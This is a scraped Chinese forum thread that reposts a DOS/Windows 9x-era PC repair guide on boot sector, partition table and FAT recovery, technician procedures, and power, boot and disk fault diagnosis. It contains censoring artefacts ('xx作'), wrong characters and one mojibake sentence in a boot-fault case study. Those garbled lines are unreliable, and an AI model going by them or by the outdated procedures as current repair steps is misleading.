              硬盘的主引导扇区是硬盘中的最为敏感的一个部件，其中的主引导程序是它的一部分，此段程序主要用于检测硬盘分区的正确性，并确定活动分区，负责把引导权移交给活动分区的DOS或其他xx作系统。此段程序损坏将无法从硬盘引导，但从软区或光区之后可对硬盘进行读写。修复此故障的方法较为简单，使用高版本DOS的fdisk最为方便，当带参数/mbr运行时，将直接更换(重写)硬盘的主引导程序。实际上硬盘的主引导扇区正是此程序建立的，fdisk.exe之中包含有完整的硬盘主引导程序。虽然DOS版本不断更新，但硬盘的主引导程序一直没有变化，从DOS3.x到目前有winDOS95的DOS，所以只要找到一种DOS引导盘启动系统并运行此程序即可修复。

              4、分区表错误引导的启动故障
              分区表错误是硬盘的严重错误，不同错误的程度会造成不同的损失。如果是没有活动分区标志，则计算机无法启动。但从软驱或光驱引导系统后可对硬盘读写，可通过fdisk重置活动分区进行修复。如果是某一分区类型错误，可造成某一分区的丢失。分区表的第四个字节为分区类型值，正常的可引导的大于32mb的基本DOS分区值为06，而扩展的DOS分区值是05。如果把基本DOS分区类型改为05则无法启动系统，并且不能读写其中的数据。如果把06改为DOS不识别的类型如efh，则DOS认为改分区不是DOS分区，当然无法读写。很多人利用此类型值实现单个分区的加密技术，恢复原来的正确类型值即可使该分区恢复正常。分区表中还有其他数据用于纪录分区的起始或终止地址。这些数据的损坏将造成该分区的混乱或丢失，一般无法进行手工恢复，唯一的方法是用备份的分区表数据重新写回，或者从其他的相同类型的并且分区状况相同的硬盘上获取分区表数据，否则将导致其他的数据永久的丢失。在对主引导扇区进行xx作时，可采用nu等工具软件，xx作非常的方便，可直接对硬盘主引导扇区进行读写或编辑。当然也可采用debug进行xx作，但xx作繁琐并且具有一定的风险。

              5、分区有效标志错误引起的硬盘故障
              在硬盘主引导扇区中还存在一个重要的部分，那就是其最后的两个字节:55aah，此字为扇区的有效标志。当从硬盘，软盘或光区启动时，将检测这两个字节，如果存在则认为有硬盘存在，否则将不承认硬盘。此标志时从硬盘启动将转入rombasic或提示放入软盘。从软盘启动时无法转入硬盘。此处可用于整个硬盘的加密技术。可采用debug方法进行恢复处理。另外，DOS引导扇区仍有这样的标志存在，当DOS引导扇区无引导标志时，系统启动将显示为:"missingoperatingsystem"。其修复的方法可采用的主引导扇区修复方法，只是地址不同，更方便的方法是使用下面的DOS系统通用的修复方法。

              6、DOS引导系统引起的启动故障
              DOS引导系统主要由DOS引导扇区和DOS系统文件组成。系统文件主要包括io.sys、msdos.sys、command.com，其中command.com是DOS的外壳文件，可用其他的同类文件替换，但缺省状态下是DOS启动的必备文件。在Windows95携带的DOS系统中，msdos.sys是一个文本文件，是启动windows必须的文件。但只启动DOS时可不用此文件。但DOS引导出错时，可从软盘或光盘引导系统，之后使用sysc:传送系统即可修复故障，包括引导扇区及系统文件都可自动修复到正常状态。

              7、fat表引起的读写故障
              fat表纪录着硬盘数据的存储地址，每一个文件都有一组连接的fat链指定其存放的簇地址。fat表的损坏意味着文件内容的丢失。庆幸的是DOS系统本身提供了两个fat表，如果目前使用的fat表损坏，可用第二个进行覆盖修复。但由于不同规格的磁盘其fat表的长度及第二个fat表的地址也是不固定的，所以修复时必须正确查找其正确位置，由一些工具软件如nu等本身具有这样的修复功能，使用也非常的方便。采用debug也可实现这种xx作，即采用其m命令把第二个fat表移到第一个表处即可。如果第二个fat表也损坏了，则也无法把硬盘恢复到原来的状态，但文件的数据仍然存放在硬盘的数据区中，可采用chkdsk或scandisk命令进行修复，最终得到*.chk文件，这便是丢失fat链的扇区数据。如果是文本文件则可从中提取并可合并完整的文件，如果是二进制的数据文件，则很难恢复出完整的文件。

              8、目录表损坏引起的引导故障
              目录表纪录着硬盘中文件的文件名等数据，其中最重要的一项是该文件的起始簇号，目录表由于没有自动备份功能，所以如果目录损坏将丢失大量的文件。一种减少损失的方法也是采用上面的chkdsk或scandisk程序的方法，从硬盘中搜索出chk文件，由目录表损坏时是首簇号丢失，在fat为损坏的情况下所形成的chk文件一般都比较完整的文件数据，每一个chk文件即是一个完整的文件，把其改为原来的名字可恢复大多数文件。

              9、误删除分区时数据的恢复
              当用fdisk删除了硬盘分区之后，表面现象是硬盘中的数据已经完全消失，在未格式化时进入硬盘会显示无效驱动器。如果了解fdisk的工作原理，就会知道，fdisk只是重新改写了硬盘的主引导扇区(0面0道1扇区)中的内容。具体说就是删除了硬盘分区表信息，而硬盘中的任何分区的数据均没有改变，可仿造上述的分区表错误的修复方法，即想办法恢复分区表数据即可恢复原来的分区即数据，但这只限于除分区或重建分区之后。如果已经对分区用format格式化，在先恢复分区后，在按下面的方法恢复分区数据。

              10、误格式化硬盘数据的恢复
              在DOS高版本状态下，格式化xx作format在缺省状态下都建立了用于恢复格式化的磁盘信息，实际上是把磁盘的DOS引导扇区，fat分区表及目录表的所有内容复制到了磁盘的最后几个扇区中(因为后面的扇区很少使用)，而数据区中的内容根本没有改变。这样通过运行"unformatc:"即可恢复原来的文件分配表及目录表，从而完成硬盘信息的恢复。另外DOS还提供了一个miror命令用于纪录当前的磁盘的信息，供格式化或删除之后的恢复使用，此方法也比较有效。


电脑维修步骤与维修xx作注意事项

《一键清理系统垃圾》

电脑维修步骤与维修xx作注意事项

              §2.1 电脑维修步骤
              对电脑进行维修，应遵循如下步骤：
              一、了解情况
              即在服务前，与用户沟通，了解故障发生前后的情况，进行初步的判断。如果能了解到故障发生前后尽可能详细的情况，将使现场维修效率及判断的准确性得到提高。了解用户的故障与技术标准是否有冲突。

              向用户了解情况，应借助第二部分中相关的分析判断方法，与用户交流。这样不仅能初步判断故障部位，也对准备相应的维修备件有帮助。
              二、复现故障
              即在与用户充分沟通的情况下，确认：
              1. 用户所报修故障现象是否存在，并对所见现象进行初步的判断，确定下一步的xx作；
              2. 是否还有其它故障存在。
              三、判断、维修
              即对所见的故障现象进行判断、定位，找出产生故障的原因，并进行修复的过程。在进行判断维修的过程中，应遵循下面一节“维修判断”中所述的原则、方法、注意事项，及第二、三部分所述内容进行xx作。

              四、检验
              1.
              维修后必须进行检验，确认所复现或发现的故障现象解决，且用户的电脑不存在其它可见的故障。电脑整机正常的标准，参见《联想台式电脑整机检验规范》；

              2. 必须按照《XX维修检验确认单》所列内容，进行整机验机，尽可能消除用户未发现的故障，并及时排除之。
              §2.2 电脑维修xx作
              在维修过程中，下列各条款应引起切实的关注和注意。
              一、在进行故障现象复现、维修判断的过程中，应避免故障范围扩大；
              二、在维修时，须查验、核对装箱单及配置；
              三、必须充分地与用户沟通。了解用户的xx作过程、出故障时所进行过的xx作、用户使用电脑的水平等。
              四、维修中第一要注意的就是观察——观察、观察、再观察！！！
              1.
              周围环境：电源环境、其它高功率电器、电、磁场状况、机器的布局、网络硬件环境、温湿度、环境的洁净程度；安放电脑的台面是否稳固。周边设备是否存在变形、变色、异味等异常现象；

              2.
              硬件环境：机箱内的清洁度、温湿度，部件上的跳接线设置、颜色、形状、气味等，部件或设备间的连接是否正确；有无错误或错接、缺针/断针等现象；用户加装的与机器相连的其它设备等一切可能与机器运行有关的其它硬件设施；

              3. 软件环境：
              A. 系统中加载了何种软件、它们与其它软、硬件间是否有冲突或不匹配的地方；
              B.
              除标配软件及设置外，要观察设备、主板及系统等的驱动、补丁是否安装、是否合适；要处理的故障是否为业内公认的BUG或兼容问题；用户加装的其它应用与配置是否合适；

              4. 加电过程中的观察：元器件的温度、异味、是否冒烟等；系统时间是否正确；
              5. 拆装部件时的观察：要有记录部件原始安装状态的好习惯，且要认真观察部件上元器件的形状、颜色、原始的安装状态等情况；
              6. 观察用户的xx作过程和习惯，及是否符合要求等。
              五、在维修前，如果灰尘较多，或怀疑是灰尘引起的，应先除尘
              六、对于自己不熟悉的应用或设备，应在认真阅读用户使用手册或其它相关文档后，才可动手xx作。
              七、平时要多注意通过《技术直通车》、《技术工程信息通报》等下发的技术资料及其他工程师们的经验来积累自己的经验和提高维修水平。
              八、禁止维修工程师为用户安装地线。如用户要安装地线，请用户联系正式电工为其安装。
              九、如果要通过比较法、替换法进行故障判断的话，应先征得用户的同意。
              十、在进行维修判断的过程中，如有可能影响到用户所存储的数据，一定要在做好备份、或保护措施、并征得用户同意后，才可继续进行。
              十一、当出现大批量的相似故障（不仅是可能判断为批量的故障）时，一定要对周围的环境、连接的设备，以及与故障部件相关的其它部件或设备进行认真的检查和记录，以找出引起故障的根本原因。

              十二、随机性故障的处理思路。随机性故障是指：随机性死机、随机性报错、随机性出现不稳定现象。对于这类故障的处理思路应该是：
              1.
              慎换硬件，特别是上门服务时。一定要在充分的软件调试和观察后，在一定的分析基础上进行硬件更换。如果没有把握，最好在维修站内进行硬件更换xx作。

              2. 以软件调整为主。调整的内容有：
              1） 设置BIOS为出厂状态（注意BIOS开关位置）
              2） 查杀病毒
              3） 调整电源管理
              4） 调整系统运行环境
              5） 必要时做磁盘整理，包括磁盘碎片整理、无用文件的清理及介质检查（注意，应在检查磁盘分区正常及分区中空余空间足够的情况下进行）。
              6） 确认有无用户自加装的软硬件，如果有，确认其性能的完好性/兼容性。
              7）
              与无故障的机器比较、对比。这种对比的一种方法是，在一台配置与故障机相同的无故障机器上，逐个插入故障机中的部件（包括软件），查看无故障机的变化，当在插入某部件后，无故障机出现了与故障机类似的现象，可判该部件有故障。注意这种方式的对比，应做得彻底，以防漏掉可能有两种部件引起同一故障的情况。

              十三、应努力学习相关技术知识、掌握xx作系统的安装、使用方法及配置工具的使用等；理解各配置参数的意义与适用的范围。
              十四、请求支持需要关注的内容
              1. 硬件及配置信息（尽可能详尽）
              2. 软件及配置信息（尽可能详尽）
              3. 周围环境
              4. 完整的故障现象描述。即用户第一次报修时的故障现象，经过维修xx作后故障现象的变化情况。（清晰的描述）
              5. 做过的维修xx作（要详尽）
              §2.3 电脑维修的基本思路
              为帮助维修工程师，顺利找到第二部分中的相关内容，在这里列出基本的判断思路，供参考使用。

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:51:35新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第5楼

               常见故障判断－－－ 加电类故障
              一、定义举例
              从上电（或复位）到自检完成这一段过程中电脑所发生的故障。
              二、可能的故障现象
              1、 主机不能加电（如：电源风扇不转或转一下即停等）、有时不能加电、开机掉闸、机箱金属部分带电等；
              2、 开机无显，开机报警；
              3、 自检报错或死机、自检过程中所显示的配置与实际不符等；
              4、 反复重启；
              5、 不能进入BIOS、刷新BIOS后死机或报错；CMOS掉电、时钟不准；
              6、 机器噪音大、自动（定时）开机、电源设备问题等其它故障。
              三、可能涉及的部件
              市电环境；电源、主板、CPU、内存、显示卡、其它可能的板卡；BIOS中的设置（可通过放电来回复到出厂状态）；开关及开关线、复位按钮及复位线本身的故障。

              四、判断要点/顺序。
              以下的文字叙述部分是对维修判断流程的补充和说明，要结合流程图来阅读。另外，本章只分析加电类的故障，如果在判断中涉及其它类故障，可转入相应故障的判断过程。以下各类同。

              1、 维修前的准备
              1) POST卡；
              2) 万用表；
              3) 试电笔；
              4) CPU负载。
              2、 环境检查
              1) 检查电脑设备：
              A. 周边及电脑设备内外是否有变形、变色、异味等现象；
              B. 环境的温、湿度情况；
              C. 加电后，注意部件、元器件及其它设备是否变形、变色、异味、温度异常等现象发生。
              2) 检查市电情况：
              A. 检查市电电压是否在220V±10%范围内，是否稳定（即是否有经常停电、瞬间停电等现象）；
              B. 市电的接线定义是否正确（即，左零右火、不允许用零线作地线用（现象是零地短接）、零线不应有悬空或虚接现象）；
              C. 供电线路上是否接有漏电保护器（且必须接地火线上），是否有地线等；
              D.
              主机电源线一端是否牢伤心地插在市电插座中，不应有过松或插不到位的现象，另一端是否可伤心在接在主机电源上，不应有过松或插不到位的情况。

              3) 检查电脑内部连接：
              A. 电源开关可否正常的通断，声音清晰，无连键、接触不良现象；
              B. 其它各按钮、开关通断是否正常；
              C. 连接到外部的信号线是否有断路、短路等现象；
              D. 主机电源是否已正确地连接在各主要部件，特别是主板的相应插座中；
              E. 板卡，特别是主板上的跳接线设置是否正确。
              4) 检查部件安装：
              A. 检查机箱内是否有异物造成短路；
              B. 或零部件安装上是否造成短路（如P4CPU风扇在主板背面的支架安装错位造成的短路等）；
              C.
              通过重新插拔部件（包括CPU、内存），检查故障是否消失（重新插拔前，应该先做除尘和清洁金手指工作，包括插槽）。如果总是通过重新插拔来解决，应检查部件安装时，是否过松、后档板尺寸是否不合适、插座太紧，以致插不到位或被挤出；

              D. 检查内存的安装，要求内存的安装总是从第一个插槽开始顺序安装。如果不是这样，请重新插好。
              5) 检查加电后的现象：
              A. 按下电源开关或复位按钮时，观察各指示灯是否正常闪亮；
              B. 风扇（电源的和CPU的等）的工作情况，不应有不动作或只动作一下即停止的现象；
              C. 注意倾听风扇、驱动器等的电机是否有正常的运转声音或声音是否过大；
              D.
              主机能加电，但无显示，应倾听主机能否正常自检（即有自检完成的鸣叫声，且硬盘灯能不断闪烁）若有，先检查显示系统是否有故障，否则检查主机问题；

              E.
              对于开机噪音大的问题，应分辨清噪音大的部位，一般情况下，噪音大的部件有风扇、硬盘、光驱和软驱动机械部件。对于风扇，应通过除尘来检查，如果噪音减小，可在风扇轴处滴一些钟表油，以加强润滑。

              3、 故障判断要点
              1) 检查主机电源：
              A. 主机电源在不接负载时，将电源到主板的插头中绿线与黑线直接短接，看能否加电，并用万用表检查是否有电压输出；
              B. 用万用表检查输出的各路电压值是否在规格允许的范围内；
              C. 在接有负载的情况下，用万用表检查输出电源的波动范围是否在超出允许范围；
              D. 对于电源一加电，只动作一下即停止工作的情况，应首先判断电源空载或接在其它机器上是否能正常工作（即检查上面提到的三点）；
              E. 如果电脑的供电不是直接从市电来，而是通过稳压设备获得，要注意用户所用的稳压设备是否完好、或是否与我们的产品的电源兼容。
              2) 在开机无显时，用POST卡检查硬件最小系统中的部件是否正常
              A. 查看POST显示的代码是否为正常值（参见《维修工具使用手册》中的代码定义）；
              B. 对于POST卡所显示的代码，应检查与之相关的所有部件。如显示的代码与内存有关，就应检查主板和内存；
              C. 倾听在硬件最小系统下，有无报警声音，若无检查的重点应在最小系统中的部件上；
              D.
              检查中还应注意的是，当硬件最小系统有报警声时，要求插入无故障的内存和显示卡（集成显示卡除外），若此时没有报警音，且有显示或自检完成的声音，证明硬件最小系统中的部件基本无故障，否则，应主要检查主板；

              E.
              在准备更换CPU来检查时，应先使用CPU负载，检查主板的供电电压是否在允许范围内，在电压正常的情况下才可进行CPU更换xx作。如果超出范围，直接更换主板。CPU电压允许值参见《维修工具使用手册》；

              3) 部件的检查：
              A. 如果硬件最小系统中的部件经POST卡检查正常后，要逐步加入其它的板卡及设备，以检查其中哪个部件或设备有问题；
              B. 对于总是通过重新插拔来解决加电故障的部件，应检查部件的后档板尺寸是否不太合适，这可通过去掉后档板检查。
              4) BIOS设置检查：
              A. 通过清CMOS检查故障是否消失；
              B. BIOS中的设置是否与实际的配置不相符（如：磁盘参数、内存类型、CPU参数、显示类型、温度设置等）；
              C. 根据需要更新BIOS检查故障是否消失。
              5) 其它方面的检查：
              A.
              在接有漏电保护器的环境中，一定要先检查市电插座上的接线是否正确（即按左零右火，上地的连接方法；零地线不可短接；零线不能悬空），再检查漏电保护器是否正确地接在火线上、容量是否过小，接着检查在一路市电线路上所接的设备的数量（特别是电脑的数量——在漏电保护器的动作电流为30mA时，应可接16~20台电脑），最后检查整机设备中有无漏电或漏电流过大的现象；

              B.
              检查用户环境中有无地线。在无地线的环境中，触摸主机的金属部分，会有麻手的感觉。这时，如果接地后，机器可正常运行，且麻手现象消失，则属正常现象，不是故障；

              C. 对于不能进BIOS，或不能刷新BIOS的情况，可先考虑主板的故障；
              D. 对于反复重启或关机的情况，除注意市电的环境（如插头是否插好等）外，要注意电源或主板是否有故障；
              E. 系统中是否加载有第三方的开关机控制软件，有应予以卸载。
              见附录一之（一）。
              六、案例
              案例一：
              问题描述：双子恒星6C/766的机器，主板是精英P6SEP-ME V2.2D，当内存不插在DIMM1时，开机无显示，但机器不报警。
              解决方案：经测试，当DIMM1上不插内存时，即使DIMM2、DIMM3都插上内存，开机也是无显。当DIMM1插上内存时，不管DIMM2、DIMM3上是否插有内存，开机正常。

              查询早期的周报得知，此问题是由于此机型集成的显卡使用的显存是共享物理内存的，而显存所要求的物理内存是要从插在DIMM1上内存中取得，当DIMM1上没有插内存时，集成显卡无法从物理内存中取得显存，故用户开机时无显。

              案例二：
              问题描述：每次计算机开机自检时，系统总会在显示512K Cache的地方停止运行了，是什么原因？
              解决方案：首先既然在显示缓存处死机，必然是该处或其后的部分有问题。记得平常开机，此项显示完后就轮到硬盘启动xx作系统了。因此，可以断定不是高速缓存的问题，就是硬盘的故障。取下硬盘安装到别的电脑上，证实硬盘是好的。这是检查计算机故障最常用的办法——替换排除法。

              现在我们把注意力集中到高速缓存上，进入CMOS设置，禁止L2 Cache，存盘退出，重启机器，电脑就可以正常工作了，可以断定是L2
              Cache的问题。
              触摸主板上的高速缓存芯片，发现有些芯片很热，估计就是这儿的问题。再次确认问题所在没错。
              触类旁通：若发现机器总死机，可运行一会后，用手触摸主板上的高速缓存芯片，发现烫手，就可在Cmos中关闭二级缓存，发现是否死机，最后定义故障所在。

              案例三：
              问题描述：用户使用T启天2600 P4 1.6G 12840DSF(特5409)计算机，开机无显示，用户现在咨询如何解决？
              解决方案：检查用户的环境，发现用户机随机附带两块显卡——主板集成一个显卡另外还有一块单独的TNT2 M64
              32M显卡，有些客户在刚刚购买电脑时由于对电脑不太熟悉，将显示器信号线接到了主板集成的显卡接头上，这样会导致开机无显，但是此时主机工作正常。

              遇到用户报修开机无显或显示器故障，请提示客户检查环境，若有不正确，提示更正后，问题即可解决。
              [此贴子已经被作者于2004-1-28 17:11:26编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:52:15新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第6楼

               常见故障判断－－－ 启动与关闭类故障
              一、定义举例
              与启动、关闭过程有关的故障。启动是指从自检完毕到进入xx作系统应用界面这一过程中发生的问题；关闭系统是指从点击关闭按扭后到电源断开之间的所有过程。

              二、可能的故障现象
              1、 启动过程中死机、报错、黑屏、反复重启等；
              2、 启动过程中报某个文件错误；
              3、 启动过程中，总是执行一些不应该的xx作（如总是磁盘扫描、启动一个不正常的应用程序等）；
              4、 只能以安全模式或命令行模式启动；
              5、 登录时失败、报错或死机；
              6、 关闭xx作系统时死机或报错。
              三、可能涉及的部件
              BIOS设置、启动文件、设备驱动程序、xx作系统/应用程序配置文件；电源、磁盘及磁盘驱动器、主板、信号线、CPU、内存、可能的其它板卡。

              四、判断要点/顺序
              1、 维修前的准备
              1) 磁盘数据线；
              2) 万用表；
              3) 查毒软件。
              2、 环境检查
              1) 机器周边及外观检查：
              A. 市电连接是否牢伤心，不应有过松或插不到位的现象；
              B. 主机硬盘指示灯是否正确闪亮，不应有不亮或常亮的现象；
              C. 观察系统是否有异味，元器件的温度是否偏高；
              D. 观察CPU风扇的转速是否不够，或是否过慢或不稳定；
              E. 倾听驱动器工作时是否有异响。
              2) 驱动器连接检查：
              A. 驱动器的电源连接是否正确、牢伤心。驱动器上的电源连接插座是否有虚接的现象；
              B. 驱动器上的跳线设置是否与驱动器连接在电缆上的位置相符；
              C. 驱动器数据电缆是否接错或漏接，规格是否与驱动器的技术规格相符（如：支持DMA66的驱动器，必须使用80芯数据电缆）；
              D. 驱动器数据电缆是否有故障（如露出芯线、有死弯或硬痕等），除可通过观察来判断外，也可通过更换一根数据电缆来检查；
              E. 驱动器是否通过其它板卡连接到系统上，或通过其它板卡（如硬盘保护卡，双网隔离卡等）来控制。
              3) 检查其它部件的安装：
              A.
              通过重新插拔部件（包括CPU、内存），检查故障是否消失（重新插拔前，应该先做除尘和清洁金手指工作，包括插槽）。如果总是通过重新插拔来解决，应检查部件安装时，是否过松、后档板尺寸是否不合适、插座太紧，以致插不到位或被挤出；

              B. 检查CPU风扇与CPU是否接触良好。最好重新安装一次。
              4) 显示的内容的观察：要注意屏幕报错的内容、死机的位置，以确定故障可能发生的部位。
              3、 故障判断要点
              1) 充分地与用户沟通，了解出现不能启动的过程及用户的xx作；
              2) BIOS设置检查：
              A.
              是否为刚更换完不同型号的硬件。如果主板BIOS支持BOOTEasy功能或BIOS防写开关打开，则建议将其关闭，待完成一次完整启动后，再开启；

              B.
              是否添加了新硬件。这时应先去除添加的硬件，看故障是否消失，若是，检查添加的硬件是否有故障，或系统中的设置是否正确（通过对比新硬件的使用手册检查）；

              C. 检查BIOS中的设置，如：启动顺序、启动磁盘的设备参数等。建议通过清CMOS来恢复；
              D.
              检查是否由于BIOS问题（包括设置及功能）引起xx作系统不能正常启动或关闭，可偿试将Windows目录下的BIOS.vxd（或VPBIOSD.vxd）改名为BIOS.old，然后重启，或关闭，若故障消失，则通过修改BIOS设备或更新BIOS来解决，否则与BIOS无关。注意测试完成以后，一定要将其改回原来的名字（注：除Windows
              98外，其它xx作系统无此文件）；
              E.
              在某些特殊情况下，应考虑升级BIOS来检查。如：对于在第一次开机启动后，某些应用或设备不能工作的情况，除检查设备本身的问题外，就可考虑更新BIOS来解决。

              以下检查应在软件最小系统下进行。
              3) 磁盘逻辑检查：
              A. 根据启动过程中的错误提示，相应地检查磁盘上的分区是否正确、分区是否激活、是否格式化；
              B. 直接检查硬盘是否已分区、格式化；
              C.
              加入一个其它无故障的驱动器（如软驱或光驱）来检查能否从其它驱动器中启动（若使用软驱，最好使用希捷的检测软盘启动）。若能，进行第3）、4）步的检查，否则进行第5）步的检查；接着、分区是否激活、有无坏道等；

              D. 硬盘上的启动分区是否已激活，其上是否有启动时所用的启动文件或命令；
              E.
              检查硬盘驱动器上的启动分区是否可访问，若不能，用相应厂商的磁盘检测程序检查硬盘是否有故障。有故障，更换硬盘；在无故障的情况下，通过初始化硬盘来检测，若故障依然存在，更换硬盘；

              F.
              在用其它驱动器也不能启动时，先将硬盘驱动器去除，看是否可启动，若仍不能，应对软件最小系统中的部件进行逐一检查，包括硬盘驱动器和磁盘传输的公共部件——磁盘接口、电源、内存等。若可启动了，最好对硬盘进行一次初始化xx作，若故障不消失，则再更换硬盘；

              G. 如果要对硬盘进行初始化xx作，但用户存有有用数据，建议用户找数据修复公司解决。
              4) xx作系统配置检查：
              A. 对于出现文件错误的提示，应按照在第一部分中提到的相应软件调试方法来修复文件；
              B.
              在不能启动的情况，建议进行一次“选择上一次启动”或用scanreg.exe恢复注册表到前期备份的注册表的方法检查故障是否能够消除；
              C.
              检查系统中有无第三方程序在运行，或系统中不当的设置或设备驱动引起启动不正常。在这里特别要注意Autoexec.bat和Config.sys文件，应屏蔽这两个文件，检查启动故障是否消失；

              D. 检查启动设置、启动组中的项、注册表中的键值等，是否加载了不必要的程序；
              E. 检查是否存在病毒。要求在一个系统中，只能安装一个防病毒软件；
              F. 必要时，通过一键恢复、恢复安装等方法，检查启动方面的故障；
              G.
              当启动中显示不正常时（如黑屏、花屏等），应按显示类故障的判断方法进行检查，但首先要注意显示设备的驱动程序是否正常、显示设置是否正确，最好将显示改变到标准的VGA方式检查。

              5) 硬件部件检查：
              A. 如果启动的驱动器是通过另外的控制卡连接的，请将驱动器直接连接在缺省的驱动器接口（主板上的）；
              B. 当在软件最小系统下启动正常后，应逐步回复到原始配置状态，来定位引起不能正常启动的部件；
              C. 要注意检查电源的供电能力，即输出电压是否在允许的范围内，波动范围是否超出允许的范围（参见《维修工具使用手册》）；
              D. 驱动器的检查，可参考磁盘类故障的判断方法进行；
              E.
              硬件方面的考虑，应从内存开始考虑：使用内存检测程序进行判断内存部分是否有故障，内存安装的位置，应从第一个内存槽开始安装，对于安装的多条内存检查内存规格是否一致、兼容等。有关内存规格请参阅附录二的相关部分。

              6) 对于不能正常关机的现象，应从下列几个方面检查：
              A.
              在命令提示符下查看BOOTLOG.TXT文件（在根目录下）。此文件是开机注册文件，它里面记录了系统工作时失败的记录，保存一份系统正常工作时的记录，与出问题后的记录相比较，找出有问题的驱动程序，在WIN.INI
              SYSTEM.INI 中找到该驱动对应的选项，或在注册表中找到相关联的对应键值，更改或升级该驱动程序，有可能将问题解决；
              B. 升级BIOS到最新版本，注意CMOS的设置（特别是APM、USB、IRQ等）；
              C. 检查是否有一些系统的文件损坏或未安装（参阅附录二之（三）的相关内容）
              D. 应用程序引起的问题，关闭启动组中的应用程序，检查关机时的声音程序是否损坏；
              E. 检查是否有某个设备引起无法正常关机，比如网卡、声卡，可通过更新驱动或更换硬件来检查；
              F. 通过安装补丁程序或升级xx作系统进行检查；
              G. 对于Windows 98SE系统的关机问题，请参阅附录二之（三）。其中的一引起论述对于其它Windows系统也有帮助。
              五、本类故障的判断流程
              见附录一之（二）。
              六、案例
              案例一：
              问题描述：客户计算机安装WIN 2000 PROFESSIONALxx作系统，每次启动均蓝屏，报MEMORY ERROR。
              解决方案：到达客户处，故障复现，向客户了解情况，客户反映发生故障前曾经安装过一根内存条，之后发生此类故障。关蟀蜗履诖嫣酰匦驴跃衫镀粒遣辉俦∕EMORY
              ERROR。考虑到WIN
              2000对硬件要求较高，而且故障是在加装内存后出现的故障，基本可以断定机器的原配硬件和软件系统没有问题。再次重新启动计算机，开机时按下F8键，选择进入“VGA模式”，此次计算机能够正常启动，并且登陆正常。在进行了一次正常登陆后，重新启动到标准模式，计算机启动正常，至此，故障排除。

              案例二：
              问题描述：客户机器被运行一段恶意程序，导致每次启动后均出现一个对话框，且该对话框无法关闭，只能强制结束，客户机器有重要程序，不愿意重新安装xx作系统。

              解决方案：首先怀疑是否是病毒，运行常用杀毒软件均不能查杀。在“开始”――“运行”中输入“MSCONFIG”，但是在“启动”组中仍然不能找到该程序。运行“SCANREG”，将注册表恢复到最老的版本故障依旧。最后只好手工编辑注册表，运行“REGEDIT”，在“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

              \CurrentVersion\RUN下，找到对应的程序文件名，删除对应的键值后，重新启动，故障排除。（注：建议在更改注册表前，使用注册表编辑器的“导出”功能进行注册表备份。）

              [此贴子已经被作者于2004-1-28 17:11:43编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:52:57新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第7楼

               常见故障判断－－－ 磁盘类故障
              一、定义举例
              这里所指的磁盘类故障表示两个方面：一是硬盘、光驱、软驱及其介质等引起的故障；另一是影响对硬盘、光驱、软驱访问的部件（如主板、内存等）引起的故障。

              二、可能的故障现象
              1、 硬盘驱动器
              1) 硬盘有异常声响，噪音较大；
              2) BIOS中不能正确地识别硬盘、硬盘指示灯常亮或不亮、硬盘干扰其它驱动器的工作等；
              3) 不能分区或格式化、硬盘容量不正确、硬盘有坏道、数据损失等；
              4) 逻辑驱动器盘符丢失或被更改、访问硬盘时报错；
              5) 硬盘数据的保护故障；
              6) 第三方软件造成硬盘故障；
              7) 硬盘保护卡引起的故障。
              2、 软盘驱动器
              1) 软驱指示灯不亮或常亮、软驱读盘声音大；
              2) 软驱划盘、软盘不能弹出或插入等；
              3) 软盘不能被格式化、软驱不读盘、软驱干扰其它驱动器或设备或应用的正常工作等；
              4) 在一个软驱中写的文件不能在另一个软驱中读出；
              5) 软驱盘符丢失或被更改、访问软驱时报错；
              6) 软驱安装不到位。
              3、 光盘驱动器
              1) 光驱噪音较大、光驱划盘、光驱托盘不能弹出或关闭、光驱读盘能力差等；
              2) 光驱盘符丢失或被更改、系统检测不到光驱等；
              3) 访问光驱时死机或报错等；
              4) 光盘介质造成光驱不能正常工作。
              三、可能涉及的部件
              硬盘、光驱、软驱及其它们的设置，主板上的磁盘接口、电源、信号线。
              四、判断要点/顺序
              1、 维修前的准备
              1) 磁盘数据线；
              2) 相应的磁盘检测软件；
              3) 查毒软件等。
              2、 硬盘驱动器
              1) 环境检查
              A. 检查硬盘连接：
              a) 硬盘上的ID跳线是否正确，它应与连接在线缆上的位置匹配；
              b) 连接硬盘的数据线是否接错或接反；
              c) 硬盘连接线是否有破损或硬折痕。可通过更换连接线检查；
              d) 硬盘连接线类型是否与硬盘的技术规格要求相符；
              e) 硬盘电源是否已正确连接，不应有过松或插不到位的现象。
              B. 硬盘外观检查：
              a) 硬盘电路板上的元器件是否有变形、变色，及断裂缺损等现象；
              b) 硬盘电源插座之接针是否有虚焊或脱焊现象；
              c) 加电后，硬盘自检时指示灯是否不亮或常亮；工作时指示灯是否能正常闪亮；
              d) 加电后，要倾听硬盘驱动器的运转声音是否正常，不应有异常的声响及过大的噪音。
              C. 硬盘的供电检查：
              a) 供电电压是否在允许范围内，波动范围是否在允许的范围内等。
              2) 故障判断要点
              A. 建议在软件最小系统下进行检查，并判断故障现象是否消失。这样做可排除由于其它驱动器或部件对硬盘访问的影响。
              B. 参数与设置检查：
              a) 硬盘能否被系统正确识别，识别到的硬盘参数是否正确；BIOS中对IDE通道的传输模式设置是否正确（最好设为“自动”）；
              b)
              显示的硬盘容量是否与实际相符、格式化容量是否与实际相符（注意，一般标称容量是按1000为单位标注的，而BIOS中及格式化后的容量是按1024为单位显示的，二者之间有3%~5%的差距。另格式化后的容量一般会小于BIOS中显示的容量）。硬盘的容量根据系统所提供的功能（如带有一键恢复），应比实际容量小很多，缩小的值请参看用户手册中的相关说明；

              c) 检查当前主板的技术规格是否支持所用硬盘的技术规格，如：对于大于8GB硬盘的支持、对高传输速率的支持等；
              C. 硬盘逻辑结构检查：参考启动类故障判断要点中的相关部分。
